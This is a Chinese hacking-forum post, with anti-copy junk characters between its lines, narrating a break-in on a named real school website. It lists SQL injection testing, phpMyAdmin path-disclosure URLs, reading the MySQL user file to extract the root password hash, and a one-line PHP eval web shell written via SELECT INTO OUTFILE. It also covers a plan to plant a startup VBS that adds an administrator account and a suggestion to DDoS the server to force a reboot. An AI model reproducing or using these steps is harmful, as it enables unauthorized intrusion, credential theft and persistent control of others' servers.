第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏. N+ n. g/ d8 e2 Q, ], J
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!7 P. S$ \8 p- i2 a. Q( m K
1 `+ c/ m2 G) t" @! T. s h4 \
, L0 }5 `8 B: w3 d
# F8 [ H% ?1 ]+ k常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
: a3 m, @' p- y: g2 n4 n: ]5 R: F. G4 e) h) j" L
那么想可以直接写入shell ,getshell有几个条件:
% {4 Y$ ]& Q* B+ z3 \. f1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF : q& R0 D! p. c& M. ^7 }6 Q- u
1 U- B* k# d! w- N/ G0 J! D试着爆绝对路径: 2 G- p! Q% U9 ]" x1 ]8 r, S- U
1./phpMyAdmin/index.php?lang[]=1 & x1 f/ Y$ [& U7 K- |$ x
2./phpMyAdmin/phpinfo.php
" [5 F: V- Z# B+ F3 X2 p3./load_file()
$ N3 m) U6 V5 [; m4./phpmyadmin/themes/darkblue_orange/layout.inc.php # t+ F" ~9 ?% a' N
5./phpmyadmin/libraries/select_lang.lib.php + @0 J3 i2 B4 k! K
6./phpmyadmin/libraries/lect_lang.lib.php
) u1 y; ^3 d9 G7./phpmyadmin/libraries/mcrypt.lib.php
- X; u; F Y% `" w8./phpmyadmin/libraries/export/xls.php 8 z1 O1 m! U5 [# G
1 `8 q3 v! a& h% d0 m& z均不行...........................
* |4 m' w4 z; O, o
& b$ ~0 o# a; [1 j4 P* E3 ~% V& \. e御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php
* z2 s* J" `8 U' m
( W! q B* d3 l权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
" H4 [/ W* J3 s' k5 y7 t% p9 z6 `$ i! F! V* w, T7 M- T
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败 / z0 m' v; C2 a Y4 ~' J
% d2 Y- e+ I" G敏感东西: http://202.103.49.66/Admincp.php 社工进不去...........
. u( Y& i+ a( A
+ h* P6 u, Y3 w3 v- l想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
" i* ?5 j: c: B( ^; r* N& Z ?4 c% F* W: s
http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini 8 w7 Z2 a O* N6 G. F2 U) z f4 n- Q
7 @, l( W' T4 b0 l
自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD - y) J; F$ o; l9 C8 _& ^
$ z: ~- l" R* s4 [/ h' H
成功读到root密码:
, P1 Y/ g% @0 z. S
: }2 p7 m$ T2 \17---- r(0072)
( @3 g3 l% A3 M, F18---- o(006f)
: ]6 q* G& u. l/ f0 b x19---- o(006f)
) \4 u% U$ K2 ~" r20---- t(0074)
6 `' ^$ a% j/ f( q' V2 Z' O& L& ^21---- *(002a) ) i* d/ c3 T" W8 a* _
22---- 8(0038) ! M8 \& D+ K4 s2 J$ A
23---- 2(0032)
3 o3 e. E' q6 y, P* H24---- E(0045) j' W& m6 ^& n5 b8 ^; _" N! G8 z, P$ u: q
25---- 1(0031) 7 @4 Y2 P$ d, d! R8 S y9 T1 `1 c
26---- C(0043)
2 b7 s x1 ?4 Y0 o2 ?; W/ a27---- 5(0035) ' y1 V' C* d! X6 F' {) J
28---- 8(0038) 5 K% b$ x7 V0 @9 g9 q; m
29---- 2(0032) : B& Q' ]( _9 [$ z" O, a7 m
30---- 8(0038)
. n0 Y( T5 l4 A31---- A(0041) 6 f) m7 C! k/ Y: u$ V
32---- 9(0039)
7 M" d* Z/ W! Q. s, O3 l% D33---- B(0042)
: B- R: n% u2 R8 B& N, ^34---- 5(0035) % L, G8 J5 H. ^) s) f8 V2 S
35---- 4(0034)
% ^. r4 B& a/ R# P9 o! x36---- 8(0038) 4 [' F& a# y' }* a8 |- G
37---- 6(0036)
: {$ m) d X/ m H38---- 4(0034)
/ n* Q' I. @2 ?8 e, D7 ?( T' t) S; q39---- 9(0039) ) N" w- I6 `6 a# a! Q! k1 T
40---- 1(0031)
. a, W# _+ T) q3 _' b, P41---- 1(0031) # a/ ^0 ]$ H' U: Q. P. W
42---- 5(0035)
" e4 c4 u, H# q* |* _43---- 3(0033) - b1 \0 t7 y: T9 u6 J
44---- 5(0035) $ `! Z1 G. N l) r4 Z( |7 l. B
45---- 9(0039) o9 L) h: ^6 x# H; Q' Z* Q9 k+ i& o8 E0 B
46---- 8(0038) z! Z! S- A& e" ~5 e- s" x
47---- F(0046)
- L# F1 j' _3 F! T3 p48---- F(0046) % v1 V( `& m5 J6 q# a% a' u2 j) h7 l
49---- 4(0034)
0 U, T. A9 m# a5 r50---- F(0046)
# J& _' C" v5 _51---- 0(0030)
' I+ W* V3 }7 C( I' x1 `5 j52---- 3(0033)
" t y$ J: `# v53---- 2(0032) & s% f8 M& a& h# K3 s5 x7 L, c, X
54---- A(0041) ! `4 m" D' z; J
55---- 4(0034)
) H1 a+ p' ~0 W56---- A(0041) . ]3 i6 R+ F& x1 G0 e& k# ]6 ~
57---- B(0042)
) o: ]: k# V# W6 b6 [$ d58---- *(0044) 4 S& u2 U# n6 g1 o
59---- *(0035)
6 j( y) F$ _$ z$ Y9 T8 G4 x60---- *(0041)
! t: D9 w! U- f0 k; U$ x61---- *0032) ' m6 ^5 l' L o5 u
# J# w: b) _3 c# f6 c
解密后成功登陆phpmyamin
; ?( ~' s/ O7 R/ A+ G' x9 ]
- t+ g, K- _: q( w+ M9 Y/ B
/ ^. f& P: E8 }. t; a$ H4 I 5 N0 b8 B' f5 X' d+ c5 C' b' v
; K( }! x% A+ E8 O/ Q; h) ~
找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php' / {; s) M% J) \7 g3 G
' x) S- g3 R5 p, P! Z成功执行,拿下shell,菜刀连接:
. u) M: Z; [" g% X4 M/ c% J2 [' g, m: f. A) v; x+ n! f1 |' Z, ^
服务器不支持asp,aspx,php提权无果................... : f3 j5 K, K) t, A3 h' }$ c! v
7 }* T+ ]2 G/ ?5 u. d3 S但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里:
4 c! G" Z1 k7 S& e( B# p- ]! G/ n% ]服务器上已经有个隐藏帐号了 & C# ~6 H3 b n8 x" w- l) d
别名 administrators H! j& }& k0 h8 z! A& Q3 t
注释 管理员对计算机/域有不受限制的完全访问权
0 j; g, ^% o1 x7 s成员
p( W0 d- L# E* T-------------------------------------------------------------------------------
! Y' i% P9 N' {admin
, p3 L+ G% x% rAdministrator
% U3 _9 R/ r6 S# W: Uslipper$4 J g# _0 E: I5 F) \
sqluser- {5 i7 p7 {/ O! L' e4 x
命令成功完成。
$ H9 d D0 d4 r
5 o1 W! x0 q9 L2 n& O& G服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。% U) c: Z9 q* F( k2 O! B9 w J
3 A" c' [* D. {! T! M9 O( z
ddos服务器重启,不然就只能坐等服务器重启了...............................$ ^' s- K1 C7 Z) M& n, [
$ Z9 G: `/ [9 T0 s/ v & g& i% e9 g2 D5 H: d7 d
| 
发表于 2013-1-11 21:32:15
收藏
支持
反对
发表于 2013-5-20 15:28:12
